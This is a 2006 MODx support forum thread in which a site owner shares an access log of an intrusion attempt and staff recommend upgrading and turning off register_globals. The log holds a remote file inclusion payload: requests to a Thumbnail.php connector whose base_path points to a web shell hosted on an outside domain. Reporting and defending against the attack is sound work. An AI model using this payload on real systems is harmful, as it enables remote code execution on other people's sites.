We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 27889
    • 415 Posts
    lemonbubble has an intrusion here is his log:
    85.107.82.111 www.bourlingueur.org - [09/Nov/2006:14:14:32 +0100] "GET /index.php?id=25 HTTP/1.1" 200 1261 "http://search.yahoo.com/search?p=%22powered+by+MODx%22&toggle=1&cop=mss&ei=UTF-8&pstart=1&fr=yfp-t-501&b=601" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
    ....
    85.107.82.111 www.bourlingueur.org - [09/Nov/2006:14:14:46 +0100] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.genchackers.net/shell.txt? HTTP/1.1" 200 4189 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
    85.107.82.111 www.bourlingueur.org - [09/Nov/2006:14:15:14 +0100] "POST /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.genchackers.net/shell.txt? HTTP/1.1" 200 3980 "http://www.bourlingueur.org/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.genchackers.net/shell.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
    
      MODx Sites & Prestations: http://dp-site.fr [Last MODx Site]
      MODx Repository: [HOME] [MetaTagsExtra] / Current Dev: [xFDM]
      • 16919
      • 18 Posts
      Thanks soda to report the log for me, I was finding the best place to publish it wink
      If you need some more informations about this "hack", I’ll try to help you the best I can ...
        • 25663 MODX Staff
        • 12,272 Posts
        Please update to 0.9.2.2 and turn register_globals Off on your server to prevent future exploits.
          Ryan Thrash, MODX Co-Founder
          Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
          • 6726
          • 7,075 Posts
          And subscribe to the Security Notices board and possibly sign up for the email alert
            .: COO - Commerce Guys - Community Driven Innovation :.


            MODx est l'outil id
            • 16919
            • 18 Posts
            I use the 0.9.5 RC2 but I can’t turn register_globals Off.
            OVH, my website host doesn’t not allow to modify this parameter and we can’t put the allow_url_fopen OFF !!! It’s not very serious undecided
              • 6726
              • 7,075 Posts
              You should be fine with 0.9.5 RC2 which turned essential global variables into constants in order to prevent issues for users with register_globals On...
              Arre you saying you got hacked with a 0.9.5 RC2 or before upgrading ?

              Remember having logs of attacks doesn’t mean you got hacked...
                .: COO - Commerce Guys - Community Driven Innovation :.


                MODx est l'outil id
                • 16919
                • 18 Posts
                Quote from: davidm at Nov 09, 2006, 04:38 PM

                Arre you saying you got hacked with a 0.9.5 RC2 or before upgrading ?
                No, I’ve been hacked with a rev 1785

                Quote from: davidm at Nov 09, 2006, 04:38 PM

                Remember having logs of attacks doesn’t mean you got hacked...
                You’re right because at the first attempt OVH has closed the http access of my website ...
                  • 22303 MODX Staff
                  • 10,725 Posts
                  I don’t understand, was something on the server compromised, or did your service disable your account because of that attempt to hack your site?